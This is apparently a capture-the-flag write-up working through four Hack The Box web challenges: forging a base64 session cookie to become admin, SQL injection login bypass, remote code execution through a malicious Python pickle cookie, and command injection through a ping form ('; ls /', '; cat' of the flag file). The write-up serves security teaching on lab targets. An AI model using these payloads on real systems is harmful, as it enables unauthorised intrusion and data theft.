We are first greeted by a login page. Let's, once again, try admin with password admin:
Looks like we'll have to create an account - let's try those credentials.
This is great, because now we know we need a user called admin. Let's create another user - I'll use username and password yes, because I doubt that'll be used.
We're redirected to the login, which makes it seem like it worked. Let's log in with the credentials we just created:
Whoops, guess we're not an admin!
When it comes to accounts, one very common thing to check is cookies. Cookies allow, among other things, for users to authenticate without logging in every time. To check cookies, we can right-click and hit Inspect Element and then move to the Console tab and type document.cookie.
Well, we have a cookie called PHPSESSID and the value eyJ1c2VybmFtZSI6InllcyJ9. Cookies are often base64 encoded, so we'll use a tool called CyberChef to decode it.
Once we decode the base64, we see that the contents are simply {"username":"yes"}.
So, the website knows our identity due to our cookie - but what's to stop us from forging a cookie? Since we control the cookies we send, we can just edit them. Let's create a fake cookie!
Note that we're URL encoding it as it ends in the special character =, which usually has to be URL encoded in cookies. Let's change our cookie to eyJ1c2VybmFtZSI6ImFkbWluIn0%3D!
Ignore the warning, but we've now set document.cookie. Refresh the page to let it send the cookies again.
And there you go - we successfully authenticated as an admin!
HTB{s3ss10n_1nt3grity_1s_0v3r4tt3d_4nyw4ys}
First we're met with a signin form:
Let's try some default creds, admin and admin.
Below, the query run on the database is shown; this seems like a clear example of SQL injection.
Ultimately, we want to try and log in as a user. To do this, we can try to inject our own SQL.
We know the payload looks like the following:
We want to trick this into always returning a user, and to do this we'll inject a clause that's always true, such as 1=1.
That will make the query equal to the following:
So here, it'll compare the username to admin, and if it's not the same the check will still pass because 1=1. However, there's a small issue with the password still being wrong. To bypass this check, we'll make everything after our injection a comment so that the databse ignores it:
That would make the query be:
As you can see, the username will always be correct due to the 1=1 and the password check is commented out! Let's try it.
We still have to input a password because some javascript checks to make sure it's there, but we can fill that with any rubbish. And we get the flag!
HTB{SQL_1nj3ct1ng_my_w4y_0utta_h3r3}
All the references to pickles implies it's an insecure deserialization challenge. pickle is a serialization format used in python.
If we check the cookies, we get the following:
Our guess is that this is a pickled python object, and decoding the base64 seems to imply that to us too:
Let's immediately try to unpickle the data, which should give us a feel for how data is parsed:
The error is quite clear - there's no anti_pickle_serum variable. Let's add one in and try again.
That error is fixed, but there's another one:
Here it's throwing an error because X (anti_pickle_serum) is not a type object - so let's make it a class extending from object!
And now there's no error, and we get a response!
So the cookie is the pickled form of a dictionary with the key serum and the value of an anti_pickle_serum class! Awesome.
For an introduction to pickle exploitation, I highly recommend this blog post. Essentially, the __reduce__ dunder method tells pickle how to deserialize, and to do so it takes a function and a list of parameters. We can set the function to os.system and the parameters to the code to execute!
Here we create the malicious class, then serialize it as part of the dictionary as we saw before.
Huh, that looks nothing like the original cookie value (which starts with KGRwMApTJ3)... maybe we missed something with the dumps?
Checking out the dumps() documentation, there is a protocol parameter! If we read a bit deeper, this can take a value from 0 to 5. If we play around, protocol=0 looks similar to the original cookie:
Let's change the cookie to this (without the b''):
As you can see now, the value 0 was returned. This is the return value of os.system! Now we simply need to find a function that returns the result, and we'll use subprocess.check_output for that.
For reasons unknown to me, python3 pickles this differently to python2 and doesn't work. I'll therefore be using python2 from now on, but if anybody know why that would happen, please let me know!
Now run it
And input it as the cookie.
As can now see that there is a flag_wIp1b file, so we can just read it!
While it's tempting to do
subprocess.check_output requires a list of parameters (as we see here) and the filename is a separate item in the list, like so:
And boom - we get the flag!
HTB{g00d_j0b_m0rty...n0w_I_h4v3_to_g0_to_f4m1ly_th3r4py..}
When we start the instance, we are met with an options menu:
It appears as if we can input the IP, which is then pinged. Let's imagine for a second how this could be implemented on the server side. A common trap developers can fall into is doing something like:
Essentially, we're passing the parameters to bash. This means we could, theoretically, insert a ; character into the ip variable, and everything behind it would be interpreted as a seperate command, e.g.:
Here, ls would be run as a separate command. Let's see if it works!
Let's try it by simply inputting ; ls to the end of the IP and submitting:
Look - as well as the ping command, we get index.php, which is the result of the ls command!
There doesn't appear to be a flag, so we'll try ; ls / to read the root directory next:
Woo - there's a flag_2viTb file! Now we'll inject ; cat /flag_2viTb to read the flag:
And boom, we've got the flag - HTB{I_f1n4lly_l00k3d_thr0ugh_th3_rc3}.
Because I prefer a command-line interface, I originally created a simple script to inject parameters for me:
This simply inputs the command as cmd, sets the POST parameters, and (really messily) parses the response to return just the data.
We can inject cat index.php to see what exactly was happening, and we immediately see the following lines:
As we guessed, it passed in the input without sanitising it to remove potential injection.
